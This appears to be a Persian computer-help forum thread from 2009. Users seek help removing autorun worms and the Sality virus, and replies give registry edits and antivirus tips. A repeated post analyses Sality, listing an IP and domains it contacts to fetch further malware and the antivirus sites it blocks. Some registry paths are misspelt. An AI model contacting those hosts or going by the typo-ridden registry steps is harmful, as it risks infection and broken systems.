:5:در ابتدا از طريق منوي Start وارد Run شويد و بعد در آن تايپ كنيد systemroot%\inf% ( بدون هيچ فاصله اي ) و Ok را بزنيد. با اين كار پوشه فايلهاي Inf سيستم شما باز ميشود.
حالا به دنبال فايلي با نام mstask.inf بگرديد ( بدون پسوند Inf ). بعد از يافتن آن را Highlight كرده و رويش راست كليك كنيد.
حالا از منوي ظاهر شده عبارت Install را انتخاب كنيد ( رويش كليك كنيد ).
در اين مرحله شما بايد CD ويندوز XP خود را درون درايو قرار داده تا مراحل نصب كامل شود.
بعد از نصب كامل ، با يك بار Restart سيستم Task Manager شما بدون هيچ گونه مشكلي باز خواهد گشت.
بعد از اينكار حتما به فكر ازبين بردن فايل Server برنامه هك كه در سيستم شما نصب شده ( اگر هك شده ايد ) باشيد تا ديگر چنين مشكلاتي برايتان پيش نيايد و در ضمن استفاده از يك Firewall قوي نيز ميتواند كمك شاياني به شما كند.

meisam317
07-05-2009, 17:36
سلام.تمام این اینترنت رو زیرو رو کردم همه آموزش ها رو خوندم اما نتونستم این ویروسی که تسک منیجر رو از کار میندازه رو از بین ببرم.خواهش میکنم یکی بگه من چه کار کنم تا این ویروس پاک بشه؟


دوستان بنده taske manager غیرفعال شده لطفا کمک کنید.هیچ یک از فایلهایم مخی نیست .فقط taske manager غیر فعال شده .با نرم افزارRRT فعال میشه ولی دوباره به حال قبل برمیگردد متشکرم راهنمائی کنید
از انجمن نرم افزار یه برنامه جایگزین تسک منیجر دانلود کن

Mcafee*
07-05-2009, 22:01
سلام به دوستان عزيز . من آنتی ويروس Eset Smart Security 4.0.424 رو روی سيستمم ريختم ( فول آپديت به تاريخ 20090507 ! )
خيلی سيستمم آلوده بود و بعد از فرمت يک اسکن کردم و هرچی ويروس بود ( از جمله همين ويروس لعنتيه autorun ) پاک کرد و الان سيستم رو پاکه پاک نشون ميده!
مشکل من اینجاست که الان هنوز هم مشکل show hidden files حل نشده و هروقت این گزينه رو ميخوام غير فعال کنم دوباره برميگرده سره جاش!! اعصابمو ريخته بهم . نميدونم مشکل از چيه . ميشه راهنمايی کنيد؟

Sajad2006
07-05-2009, 22:05
سلام.
لطفا لینک های صفحه ی اول رو چک کنید.
مثل:
Flash_Disinfector

farshidshd
08-05-2009, 11:50
من همه ی اون راه هایی که show hidden رو فعال میکنه انجام دادم ولی نشد
درایوهامم تو یه پنجره جدید باز میشه
همه اون راه ها رو انجام دادم نشد

REZAt1980
09-05-2009, 05:11
سلام.

من وارد هر فولدری میشم. یکی از فایل هام رو اونجا به نامش کپی میکنه ولی حجمش 39 کیلوبایته . همه جا که میرم دوتا فولدر یکی بی نام و یکی با نام نیو فولدر ایجاد میشه و هر درایوی رو باز میکنم یه صفحه ی جدید باز میکنه. با همه ی آنتی ویروس ها هم انجام دادم نشناختندش. فولدر آپشن هم ناپدید شده. سرچ هم کار نمیکنه.

لطفا راهنمایی.

picher_s
09-05-2009, 08:39
سلام.
من وارد هر فولدری میشم. یکی از فایل هام رو اونجا به نامش کپی میکنه ولی حجمش 39 کیلوبایته . همه جا که میرم دوتا فولدر یکی بی نام و یکی با نام نیو فولدر ایجاد میشه و هر درایوی رو باز میکنم یه صفحه ی جدید باز میکنه. با همه ی آنتی ویروس ها هم انجام دادم نشناختندش. فولدر آپشن هم ناپدید شده. سرچ هم کار نمیکنه.
لطفا راهنمایی.

سلام

مگه شما نمیتونید آنتی بنصبید؟!
اگه میتونید نود برای این ویروس عالی عمل میکنه.
سپس در اخر یه regrepair هم بزنید.



من همه ی اون راه هایی که show hidden رو فعال میکنه انجام دادم ولی نشد
درایوهامم تو یه پنجره جدید باز میشه
همه اون راه ها رو انجام دادم نشد


مگه شما هم نمیتونید آنتی بنصبید؟!
حتما یه regrepair رو هم ازمایش کن.
اگه میخواهید دستی بکشیدش یه تاپیک براش بزنید.


مشکل من اینجاست که الان هنوز هم مشکل show hidden files حل نشده و هروقت این گزينه رو ميخوام غير فعال کنم دوباره برميگرده سره جاش!! اعصابمو ريخته بهم . نميدونم مشکل از چيه . ميشه راهنمايی کنيد؟

دلیلش اینه که ویرسه هنوز تو حافظه مقیمه.
اسم ویروستون چیه؟ مسیر اجراش کجاست ؟ پیغامه آنتی ویروستون چیه؟

موفق باشید.

hilias
09-05-2009, 20:38
سلام دوستان من با یک مشکل عجیب بر خورد کردم اونم اینه که من یک فلش دارم توش پر اطلاعت بود زدم به یک کامپیوتر پاک پاک به اون کامپیوتر هم برای این مطمئن هستم چون تازه اسمبل شده بود . اون فلش رو زدم به نوت بوکم دیگه هیچ فایلی رو ندیدم . حجم فلش نشون میده فایلها توش هست ولی فایلها و فلدر های رو نشون نمیده تمام راه هایی هم که شما گفتید رو برای این مورد رفتم شاید با 10 کامپیوتر چک کردن با هر آنتی ویروسی که میشناختم اسکن کردم که همشون هم آپدیت بودن من الان اطلاعات اون فلش و احتیاج دارم باید چه خاکی بر سرم بریزم .:19: :18: :13: در ضمن شرمنده اگر قبلا توضیح دادید من نتونستم همه 140 صفحه رو بخونم .


سلام کسی نمیتونه به منم بگه باید چه کار کنم . من فایل های فلشم رو خیلی لازم دارم .

Mcafee*
09-05-2009, 20:43
دلیلش اینه که ویرسه هنوز تو حافظه مقیمه.
اسم ویروستون چیه؟ مسیر اجراش کجاست ؟ پیغامه آنتی ویروستون چیه؟

موفق باشید.
دوست عزيز من ،
با توجه به اینکه آنتی ويروسم ( Eset Smart Security 4.0.424 ) هر روز آپديت ميشه و من بعدش سيستم رو اسکن ميکنم ، هيچ ويروسی رو پيدا نميکنم!!
اون اول که ويروسی شده بود ، بعد از فرمت ويندوز و نصب دوباره ( XP sp2 ) آنتی ويروس رو ريختم و آپديت کردم و با يک اسکن هرچی ويروس بود رو پاک کردم! من مشکل این رو هم داشتم که روی هر درايوی که کليک ميکردم يک پنجره جديد باز ميشد ، حالا اون رفع شده اما مشکل Show hidden files هنوز سره جاش مونده!
اسم ويروس هم Autorun بود ، اینم از يه عکس از نتيجه اسکن! :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

wordship
10-05-2009, 10:02
برای بر طرف کردن مشکلی که عنوان کردید کافیست در Start Menu گزینه Run را انتخاب کنید و در آن تایپ کنید regedit.در پنجره باز شده مسیر زیر را گام به گام دنبال و باز کنید. برای باز کردن ، علامت کوچک (+) کنار هر شاخه را کلیک کنید:Regedit ==> HKEY_LOCAL_MACHINE/SOFTWARE/MICROSOFT/WINDOWS/CURRENTVERTION/EXPLORER//ADVANCED/FOLDER/HIDDEN/SHOWALL.اکنون در سمت راست پنجره ، روی CheckedValue کلیک کنید و مقدار Value Date را از صفر به یک تبدیل کنید.سیستم را یکبار Restart کنید و مشکل شما برطرف خواهد شد.............................................. ...... ..................................... ...........................حال اگر folder option نبود يعني پاك شده بود مي توانيم به روش زير آن را برگردانيم:RUN را باز مي كنيم و داخلش regedit را مي نويسيم تا وارد رجيستري ويندوز شويم. سپس از شاخه HKEY-LOCAL-MACHINE زير شاخه SOFTWARE و سپس Microsoft و زير شاخه windows و سپس current version و از زير شاخه آن policiesرا رويش راست كليك كرده و new key را زده و يك key جديد ميسازيم نام آن را Explorer مي گذاريم.(دقت كنيد حتما E را با حروف بزرگ بنويسيد).در مرحله بعد روي Explorer كه ساختيم راست كليك مي كنيم و new DWORD value را مي زنيم تا يك value جديد بسازيم نام آن را No folder option ميسازيم.(توجه كنيد N را با حروف بزرگ تايپ كنيد و سر هم بنويسيد).سپس روي آن دبل كليك مي كنيم و مقدار value را صفر(0) مي گذاريم.(اگر اين مقدار 1 باشد يعني كامپيوتر ويروسي است)بعد حتما بايد سيستم را restart كنيم.با اين روش folder option برمي گردد.با اين روش بعضي از فايل هاي ويروسي كه قبلا مخفي بودند با clear كردن ديده ميشوند البته كمرنگتر به اين ترتيب:Auto run.infAuto play.exeNew folder به صورت شورتكاتRECYCLER

saeed7008
10-05-2009, 23:55
آقا من مشکل open with روی درایورام پیدا شده شما قبلا راه حلشو گفتی ممنون ولی فایلی که گذاشتی دانلود نمیشه!!!!

picher_s
11-05-2009, 08:04
دوست عزيز من ،
با توجه به اینکه آنتی ويروسم ( Eset Smart Security 4.0.424 ) هر روز آپديت ميشه و من بعدش سيستم رو اسکن ميکنم ، هيچ ويروسی رو پيدا نميکنم!!
اون اول که ويروسی شده بود ، بعد از فرمت ويندوز و نصب دوباره ( XP sp2 ) آنتی ويروس رو ريختم و آپديت کردم و با يک اسکن هرچی ويروس بود رو پاک کردم! من مشکل این رو هم داشتم که روی هر درايوی که کليک ميکردم يک پنجره جديد باز ميشد ، حالا اون رفع شده اما مشکل Show hidden files هنوز سره جاش مونده!
اسم ويروس هم Autorun بود ، اینم از يه عکس از نتيجه اسکن! :


سلام

َشما این برنامه رو اجرا کن و دکمه AutoRemove And Repair رو بزن.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشید.

star.night
11-05-2009, 12:29
چند وقته نمیتونم وارد صفحه ایمیلم بشم. هر کاری می کنم این صفحه را باز نمی کند. نه با Internet Explorer و نه با FireFox تمام ایمیلهای مهم و حیاتیم رو هم نمی تونم چک کنم.تو رو خدا کمکم کنید.
انتی ویروسم Nod32 است. هر روز آپدیتش می کنم. با User و Pass سایت ------ با تاریخ روز.

ushuaia
11-05-2009, 14:16
لام استاد ..سیستم من ویروسی گرفته که نمی دانم چی است فلودر اپشن را از بین برده و وقتی روی درایو ها کلیک می کنم درایو ها باز نمی شود و اخطار می دهند و در راست کلیک کردن auto play , open است و گزینه دیگری به نام اوپن است که در جلوی ان کلمات نا مفهومی نوشته .........استاد ایا انتی ویروس مخصوص دارد و اموزش پاک کردن این ویروس را ممنون می شوم یاد دهید و نام ویروس چیست ...........................ممنون

saeed774
12-05-2009, 15:49
چند وقته نمیتونم وارد صفحه ایمیلم بشم. هر کاری می کنم این صفحه را باز نمی کند. نه با Internet Explorer و نه با FireFox تمام ایمیلهای مهم و حیاتیم رو هم نمی تونم چک کنم.تو رو خدا کمکم کنید.
انتی ویروسم Nod32 است. هر روز آپدیتش می کنم. با User و Pass سایت ------ با تاریخ روز.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

omnix
12-05-2009, 23:38
جناب آقای مهدی از اینکه اطلاعات خوبی در اختیارم گذاشتین ممنونم امیدوارم همیشه موفق باشید

mohsentanha
13-05-2009, 00:14
سلام
ببخشید چطوری میشه یه ویروسی رو که فولدر ساخته رو کلا پاک کرد یه ویروسی رو که هیچ انتی ویروسی نمیتونه پاکش کنه
یا اصلا چطوری میشه یه پوشه یا یه فایل خیلی حساس مثل فایلهای سیستمی رو پاک کرد؟؟؟؟؟؟؟؟؟؟؟
بعد یه ویروس هست که نوشته های سیاسی میاد اینو باید چطوری منهدم کنیم؟؟؟؟؟؟؟؟؟؟
شرکت ایمن (حالا دقیق اسم شرکتو بلد نیستم) گفته میتونیم پاکش کنیم ولی پول زیاد میگیرن وسازمان هم نمی خواد انقدر خرج کنه اگه راه حلی هست کمک کنید

r2t
13-05-2009, 22:44
لام استاد ..سیستم من ویروسی گرفته که نمی دانم چی است فلودر اپشن را از بین برده و وقتی روی درایو ها کلیک می کنم درایو ها باز نمی شود و اخطار می دهند و در راست کلیک کردن auto play , open است و گزینه دیگری به نام اوپن است که در جلوی ان کلمات نا مفهومی نوشته .........استاد ایا انتی ویروس مخصوص دارد و اموزش پاک کردن این ویروس را ممنون می شوم یاد دهید و نام ویروس چیست ...........................ممنون


سلام
دوست عزيز صفحه اول تاپيك رو خوب مطالعه كن حتما هست:10:

Viren
14-05-2009, 17:22
سلام

من تروجان TR/Crypt.ZPACK.Gen گرفتم
چطور پاکش کنم؟بدجور خراب کرده سیستم رو

ممنون

Mostafa_Amol
15-05-2009, 10:03
سلام

هر کسی وقتی ویندوز عوض می کنه برای اجرای بعضی برنامه ها از پنجره open with استفاده می کنه تا به سیستمش بگه فلان پسوند رو با فلان نرم افزار اجرا کن ..... اما این کارو یک بار انجام می ده و دیگه اون پسوند به شکل فایل ناشناس توی کامپیوتر دیده نمی شه .

ولی الآن دومین باره که این مشکل پیش اومده (البته دیشب یه فلش آلوده به سیستمم وصل کردم)

من قبلا مشخص کرده بودم که مثلا فایل ها با پسوند mov رو با quick time اجرا کنه اما الآن سیستمم نمی دونه باید با چه پسوندی اونو اجرا کنه و شکل آیکونش به شکل فایل های ناشناس در اومده و با دوبار کلیک روش پنجره ی open with باز می شه. البته بعضی وقتا شکل آیکون همون برنامه ای است که قبلا بهش گفتم که با اون اجرا کنه هست ولی با دوبار کلیک روش پنجره ی open with باز می شود.

ویروسه؟ راه حلش چیه؟

متشکرم
یاحق

saber57
15-05-2009, 22:46
خسته نباشید

چطور از شر کرمهای اینترنتی مثل w32 پیشرفته، دکتر واتسون و .... خلاص بشم . وقتی به Performance قسمت taskmrg مراجعه میکنم میبینم که cpu نوسان شدیدی داره یعنی منحنی عملکردش مثلا از 5 میپره به 100 بعد دوباره برمیگرده .لطفا راهنمایی کنید. :20:

picher_s
16-05-2009, 12:32
سلام ریاضی دان.


دکتر واتسون ویروس نیست ، دکتره ویندوزه و خیلی به شما کمک میکنه.


خیلی از ویروسها با W32 شچطور از شر کرمهای اینترنتی مثل w32
شما یه کسپره به روز بنصب.
موفق باشید.

picher_s
16-05-2009, 12:36
سلام

من تروجان TR/Crypt.ZPACK.Gen گرفتم
چطور پاکش کنم؟بدجور خراب کرده سیستم رو

ممنون

سلام.
این روز ها خیلی گسترش پیدا کرده.
یه کسپر یا AVIRA برات پاکش میکنه.
از اونهایی نیست که بد خیم باشه.
موفق باشید.

kral_pontiac
17-05-2009, 17:17
ویروسهامو تا حالا خودم دستی پاک کردم . البته تازگیها یه آواست هم نصب کرده ام که خیلی عالیه کارش .
اما دیروز یه ویروس آتورانی گرفتم که .......
اولا همه فایلهای exe رو خراب میکنه . رو هر فایل exe که کلیک بشه خراب میشه و دیگه قابل استفاده نیست .
دوما task manager و show hidden file و همشون رو قفل میکنه . با فایلهای بچ هم پاک میکنم ولی باز برمیگردند .
آواست هم ویروسه رو تو سیستم 32 پیدا میکنه و پاکش میکنه ولی باز همون ویروس دو سه ثانیه بعد ساخته میشه .
البته اینم بگم که سیستم با سیف مد لود نمیشه تا بتونم ویروسه رو پاک کنم .

picher_s
18-05-2009, 09:03
ویروسهامو تا حالا خودم دستی پاک کردم . البته تازگیها یه آواست هم نصب کرده ام که خیلی عالیه کارش .
اما دیروز یه ویروس آتورانی گرفتم که .......
اولا همه فایلهای exe رو خراب میکنه . رو هر فایل exe که کلیک بشه خراب میشه و دیگه قابل استفاده نیست .
دوما task manager و show hidden file و همشون رو قفل میکنه . با فایلهای بچ هم پاک میکنم ولی باز برمیگردند .
آواست هم ویروسه رو تو سیستم 32 پیدا میکنه و پاکش میکنه ولی باز همون ویروس دو سه ثانیه بعد ساخته میشه .
البته اینم بگم که سیستم با سیف مد لود نمیشه تا بتونم ویروسه رو پاک کنم .

سلام


ولا همه فایلهای exe رو خراب میکنه . رو هر فایل exe که کلیک بشه خراب میشه و دیگه قابل استفاده نیست

Virut اینکارها رو انجام میده. یه جستجو بزن.

اگر هم تونستی آنتی بنصبی کسپر رو بنصب کارت رو راه میندازه.

موفق باشید.

wordship
18-05-2009, 16:03
ورژن جديد ويروس نيوفلدر را چطوري ميشه پاك كرد نميذاره انتي ويروس هم بياد بالا

wordship
18-05-2009, 19:51
ویروس خطرناک سالیتی win32.Sality Virus

این ویروس در چند ماه گذشته جزء شایع ترین ویروسها بوده است و انواع مختلفی دارد .


غیرفعال کردن Alt+Ctrl+Delete یا همان تسک منیجر Task Manager ، از کار افتادن Regedit ( رجیستری ویندوز) ،همچنین محدود کردن دسترسی به سایتهای آنتی ویروس ، بستن آنتی ویروس و همچنین خراب کردن فایلهای اجرایی سیستم مختصری از اعمال این ویروس است .


من در این مبحث به عملکرد کلی این ویروس میپردازم و در ادامه روشی برای حذف این ویروس آموزش داده ام.


عناوین این ویروس و اسامی مورد شناسایی انتی ویروسهای معروف را در این صفحه مشاهده نمایید :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



شیوه آلوده سازی ویرس Sality


این ویروس پس از اجرا ، فایل آلوده ای را با نامی تصادفی و پسوند SYS در مسیر زیر قرار می دهد :

%System%\drivers

این کامپوننت آلوده ، در واقع یک Device Driver میباشد که مانند یک rootkit در سطح کرنل سیستم عمل می کند و به ویروس اجازه می دهد که خودش و عملکردش را در سیستم مخفی کند . از آنجایی که این شیوه تنها در سیستمهای مبتنی بر ویندوز ان تی (Windows NT-based operating systems) قابل اجراست .
لذا ویندوزهای NT/2000/XP/2003 در معرض آلودگی این ویروس هستند .

من در یکی از سیستمهای آلوده به این ویروس ، پراسسی به نام SCVHOST.exe را مشاهده کردم که در واقع پراسس اصلی ویروس بود .

توجه کنید که نام SCVHOST.exe بسیار شبیه فایل سیستمی SVCHOST.exe میباشد وتنها دو حرف C و V جابجا شده اند .

در واقع وجود یکی از پراسسهای زیر در سربرگ Processes ممکن است یکی از نشانه های آلودگی سیستم به ویروس Sality باشد :

blastclnnn.exe

hinhem.scr

SCVHOST.exe



این ویروس متن زیر را در فایل SYSTem.ini موجود در شاخه ویندوز اضافه می کند :



[MCIDRV_VER]
DEVICEMB=

که منظور از random number یک عدد تصادفی است .

همچنین کلید رجیستری زیر را در رجیستری ویندوز ایجاد می کند که ترکیبی است از نام کامپیوتر و یک عدد سه رقمی تصادفی :

HKCU\Software\<3 random numbers>

مثلا :

HKCU\Software\EliassMaleki498

در این کلید ویروس متغیرهای مورد استفاده خود را ایجاد می کند .

در یکی از سیستمهای آلوده من مسیر رجیستری زیر را که توسط ویروس ایجاد شده بود یافتم :

HKCU\Software\ACS-IR914

که ACS-IR نام کامپیوتر و عدد 914 همان عدد سه رقمی تصادفی بود.


این ویروس همچنین کلیه درایوهای محلی و یا شبکه ای و یا قابل حمل مانند فلش دیسکهای متصل به سیستم را یافته و خود را در آنها کپی می کند .

این ویروس همانند بسیاری از ویروسهای جدید با استفاده از ایجاد فایل Autorun.inf در درایوها و حافظه های فلش از این روش برای تکثیر خود بهره میگیرد .

وجود فایل Autorun.inf در هر نوع درایوی موجب می شود به محض دابل کلیک کردن بر روی درایو دستورات موجود در Autorun.inf اجرا شود که این دستورات ، دستوراتی شامل اجرای مجدد ویروس و تکثیر مجدد در کلیه درایوهاست .


بارگذاری ویروسها و بدافزارهای دیگر :



این ویروس با اتصال به دامینها و سایتهای زیر ، بدافزارهای دیگری را نیز دانلود کرده و به سیستم آلوده منتقل می کند :



89.119.67.154
bjerm.mass.hc.ru
klkjwre77638dfqwieuoi888.info
kukutrustnet777.info
kukutrustnet777888.info
kukutrustnet888.info
kukutrustnet987.info
lpbmx.ru
mattfoll.eu.interia.pl
st1.dist.su.lt
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])





غیر فعال کردن Task Manager و Registry Editor و Show Hidden Files



این ویروس ضمن از کار انداختن تسک منیجر Task Manager یا همان Alt+Ctrl+Delete موجب از کار افتادن ویرایشگر رجیستری (Regedit) نیز میگردد .

در صورت آلوده شدن سیستم به تین ویروس Folder Option نیز در مواقعی حذف می شود و یا در صورت وجود ، عملکرد نمایش فایهای مخفی و سیستمی نیز غیرفعال میگردد .

( در واقع وقتی شما گزینه

Show hidden files and folders
Hide extensions for known file types

را انتخاب میکنید و همچنین گزینه

Hide protected operating system files (Recommended)

را علامتدار می کنید باز فایهای سیستمی و مخفی نمایش نمی یابد )

در یکی از نسخه ها با جرای دستور بازگرداندن تسک منیجر بای چند لحظه تسک منیجر کار می کند ولی بسرعت غیر فعال میگردد .



بالا نیامدن سیستم در حالت Safe Mode



این ویروس موجب می شود سیستم در حالت سیف مود (Safe Mode) نیز بالا نیاید و پس از چند لحظه ری استارت شود !



تخریب و آلوده کردن فایلهای SCR و EXE


از بدترین اعمالی که این ویروس انجام می دهد خراب کردن فایلهای اجرایی سیستم با پسوند exe و SCR میباشد بطوریکه اغلب فایلهای exe و SCR موجود در درایو C را آلوده کردن و کدهایی را در آنها تزریق می کند و در نتیجه فایهای فوق نیز بعنوان ویروس Sality شناخته می شوند و بکلی خراب می شوند .

همچنین بسیاری از فایلهای اجرایی درایوهای دیگر را بطور تصادفی آلوده می کند .

حذف فایلها و بستن پراسسهای خاص:



این ویروس همچنین ممکن است فایلهای با پسوندهای زیر را حذف کند :

*.AVC

*.VDB



جالب اینجاست این ویروس به شما اجازه نصب برنامه های آنتی ویروس را می دهد اما به محض اجرای آنتی ویروس آن را می بندد ! من از کسپرسکی استفاده کردم که پس از اجرای کسپرسی پس از حدود 2 ثانیه انتی ویروس توسط ویروس فوق بسته می شود !

این ویروس فایلها یا پراسسهایی که اسامی آنها دارای کلمات زیر میباشد را حذف کرده و یا می بندد (Terminate and Delete the Process )



لیست این کلمات را در این صفحه میتوانید مشاهده کنید.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید



خاتمه اجرای سرویسهای خاصی در ویندوز


Terminates Services

این ویروس سرویسهای در حال اجرای سیستم را که به نامهای زیر هستند را خاتمه می دهد :

لیست این پراسسها را در اینجا ببینید .


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید


جلوگیری از دسترسی و اتصال به وب سایتهای خاص :

این ویروس دسترسی سیستم را به سایتهای اینترنتی خاصی را محدود می کند . این عمل را از طریق الحاق یک فایل SYS که وظیفه انجام IP Traffic Filter Device Driver را دارد ، انجام می دهد .

لذا کلیه سایتها و دامینتهایی که اسامی آنها دارای کلمات زیر میباشد بلوکه شده و دسترسی سیستم آلوده به آنها محدود میگردد


upload_virus
sality-remov
virusinfo.
cureit.
drweb.
onlinescan.
spywareinfo.
ewido.
virusscan.
windowsecurity.
spywareguide.
bitdefender.
pandasoftware.
agnmitum.
virustotal.
sophos.
trendmicro.
etrust.com
symantec.
mcafee.
f-secure.
eset.com
kaspersky

نکته قابل توجه : ممکن است سیستمی آلوده به این ویروس باشد اما با توجه به چند ریختی بودن ویروس ، اسامی بعضی از فایلها و یا مسیرهای ذکر شده متفاوت باشد اما بسیاری از عملکردها ، مانند از کارفتادن تسک منیجر و رجیستری در کلیه نسخه های این ویروس مشترک است .

منبع : wordship

wordship
18-05-2009, 19:52
ویروس خطرناک سالیتی win32.Sality Virusاین ویروس در چند ماه گذشته جزء شایع ترین ویروسها بوده است و انواع مختلفی دارد .غیرفعال کردن Alt+Ctrl+Delete یا همان تسک منیجر Task Manager ، از کار افتادن Regedit ( رجیستری ویندوز) ،همچنین محدود کردن دسترسی به سایتهای آنتی ویروس ، بستن آنتی ویروس و همچنین خراب کردن فایلهای اجرایی سیستم مختصری از اعمال این ویروس است .من در این مبحث به عملکرد کلی این ویروس میپردازم و در ادامه روشی برای حذف این ویروس آموزش داده ام.عناوین این ویروس و اسامی مورد شناسایی انتی ویروسهای معروف را در این صفحه مشاهده نمایید :
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید آلوده سازی ویرس Salityاین ویروس پس از اجرا ، فایل آلوده ای را با نامی تصادفی و پسوند SYS در مسیر زیر قرار می دهد :%System%\driversاین کامپوننت آلوده ، در واقع یک Device Driver میباشد که مانند یک rootkit در سطح کرنل سیستم عمل می کند و به ویروس اجازه می دهد که خودش و عملکردش را در سیستم مخفی کند . از آنجایی که این شیوه تنها در سیستمهای مبتنی بر ویندوز ان تی (Windows NT-based operating systems) قابل اجراست .لذا ویندوزهای NT/2000/XP/2003 در معرض آلودگی این ویروس هستند .من در یکی از سیستمهای آلوده به این ویروس ، پراسسی به نام SCVHOST.exe را مشاهده کردم که در واقع پراسس اصلی ویروس بود .توجه کنید که نام SCVHOST.exe بسیار شبیه فایل سیستمی SVCHOST.exe میباشد وتنها دو حرف C و V جابجا شده اند .در واقع وجود یکی از پراسسهای زیر در سربرگ Processes ممکن است یکی از نشانه های آلودگی سیستم به ویروس Sality باشد :blastclnnn.exehinhem.scrSCVHOST.exeاین ویروس متن زیر را در فایل SYSTem.ini موجود در شاخه ویندوز اضافه می کند :[MCIDRV_VER]DEVICEMB=که منظور از random number یک عدد تصادفی است .همچنین کلید رجیستری زیر را در رجیستری ویندوز ایجاد می کند که ترکیبی است از نام کامپیوتر و یک عدد سه رقمی تصادفی :HKCU\Software\مثلا :HKCU\Software\EliassMaleki498در این کلید ویروس متغیرهای مورد استفاده خود را ایجاد می کند .در یکی از سیستمهای آلوده من مسیر رجیستری زیر را که توسط ویروس ایجاد شده بود یافتم :HKCU\Software\ACS-IR914که ACS-IR نام کامپیوتر و عدد 914 همان عدد سه رقمی تصادفی بود.این ویروس همچنین کلیه درایوهای محلی و یا شبکه ای و یا قابل حمل مانند فلش دیسکهای متصل به سیستم را یافته و خود را در آنها کپی می کند .این ویروس همانند بسیاری از ویروسهای جدید با استفاده از ایجاد فایل Autorun.inf در درایوها و حافظه های فلش از این روش برای تکثیر خود بهره میگیرد .وجود فایل Autorun.inf در هر نوع درایوی موجب می شود به محض دابل کلیک کردن بر روی درایو دستورات موجود در Autorun.inf اجرا شود که این دستورات ، دستوراتی شامل اجرای مجدد ویروس و تکثیر مجدد در کلیه درایوهاست .بارگذاری ویروسها و بدافزارهای دیگر :این ویروس با اتصال به دامینها و سایتهای زیر ، بدافزارهای دیگری را نیز دانلود کرده و به سیستم آلوده منتقل می کند :89.119.67.154bjerm.mass.hc.ruklkjwre77638dfqwieuo i888.infokukutrustnet777.infokukutrustnet777888.in fokukutrustnet888.infokukutrustnet987.infolpbmx.ru mattfoll.eu.interia.plst1.dist.su.lt[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] wieluoi.infoغیر فعال کردن Task Manager و Registry Editor و Show Hidden Filesاین ویروس ضمن از کار انداختن تسک منیجر Task Manager یا همان Alt+Ctrl+Delete موجب از کار افتادن ویرایشگر رجیستری (Regedit) نیز میگردد .در صورت آلوده شدن سیستم به تین ویروس Folder Option نیز در مواقعی حذف می شود و یا در صورت وجود ، عملکرد نمایش فایهای مخفی و سیستمی نیز غیرفعال میگردد .( در واقع وقتی شما گزینهShow hidden files and foldersHide extensions for known file typesرا انتخاب میکنید و همچنین گزینهHide protected operating system files (Recommended)را علامتدار می کنید باز فایهای سیستمی و مخفی نمایش نمی یابد )در یکی از نسخه ها با جرای دستور بازگرداندن تسک منیجر بای چند لحظه تسک منیجر کار می کند ولی بسرعت غیر فعال میگردد .بالا نیامدن سیستم در حالت Safe Modeاین ویروس موجب می شود سیستم در حالت سیف مود (Safe Mode) نیز بالا نیاید و پس از چند لحظه ری استارت شود !تخریب و آلوده کردن فایلهای SCR و EXEاز بدترین اعمالی که این ویروس انجام می دهد خراب کردن فایلهای اجرایی سیستم با پسوند exe و SCR میباشد بطوریکه اغلب فایلهای exe و SCR موجود در درایو C را آلوده کردن و کدهایی را در آنها تزریق می کند و در نتیجه فایهای فوق نیز بعنوان ویروس Sality شناخته می شوند و بکلی خراب می شوند .همچنین بسیاری از فایلهای اجرایی درایوهای دیگر را بطور تصادفی آلوده می کند .حذف فایلها و بستن پراسسهای خاص:این ویروس همچنین ممکن است فایلهای با پسوندهای زیر را حذف کند :*.AVC*.VDBجالب اینجاست این ویروس به شما اجازه نصب برنامه های آنتی ویروس را می دهد اما به محض اجرای آنتی ویروس آن را می بندد ! من از کسپرسکی استفاده کردم که پس از اجرای کسپرسی پس از حدود 2 ثانیه انتی ویروس توسط ویروس فوق بسته می شود !این ویروس فایلها یا پراسسهایی که اسامی آنها دارای کلمات زیر میباشد را حذف کرده و یا می بندد (Terminate and Delete the Process )لیست این کلمات را در این صفحه میتوانید مشاهده کنید.
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید اجرای سرویسهای خاصی در ویندوزTerminates Servicesاین ویروس سرویسهای در حال اجرای سیستم را که به نامهای زیر هستند را خاتمه می دهد :لیست این پراسسها را در اینجا ببینید .
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید از دسترسی و اتصال به وب سایتهای خاص :این ویروس دسترسی سیستم را به سایتهای اینترنتی خاصی را محدود می کند . این عمل را از طریق الحاق یک فایل SYS که وظیفه انجام IP Traffic Filter Device Driver را دارد ، انجام می دهد .لذا کلیه سایتها و دامینتهایی که اسامی آنها دارای کلمات زیر میباشد بلوکه شده و دسترسی سیستم آلوده به آنها محدود میگرددupload_virussality-removvirusinfo.cureit.drweb.onlinescan.spywareinfo .ewido.virusscan.windowsecurity.spywareguide.bitde fender.pandasoftware.agnmitum.virustotal.sophos.tr endmicro.etrust.comsymantec.mcafee.f-secure.eset.comkasperskyنکته قابل توجه : ممکن است سیستمی آلوده به این ویروس باشد اما با توجه به چند ریختی بودن ویروس ، اسامی بعضی از فایلها و یا مسیرهای ذکر شده متفاوت باشد اما بسیاری از عملکردها ، مانند از کارفتادن تسک منیجر و رجیستری در کلیه نسخه های این ویروس مشترک است .منبع : urc

picher_s
19-05-2009, 07:40
ورژن جديد ويروس نيوفلدر را چطوري ميشه پاك كرد نميذاره انتي ويروس هم بياد بالا

سلام

شما ابتدا از Combofix رو دون و اجرا کنید.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سپس نود32 رو بنصبید.

موفق باشید.

wordship
19-05-2009, 12:36
مرسي واقعا مفيد بود.

iman_kj1360
19-05-2009, 13:29
سلام بر و بچ باحال خودم
من با کاسپر آپدیت شده تونستم این ویروس رو بگیرم

ویرانه نه آن است که جمشید بناکرد
ویرانه نه آنست که فرهاد فرو ریخت
ویرانه دل ماست که با هر نظر دوست
صد بار بنا گشت و دگر بار فرو ریخت

kral_pontiac
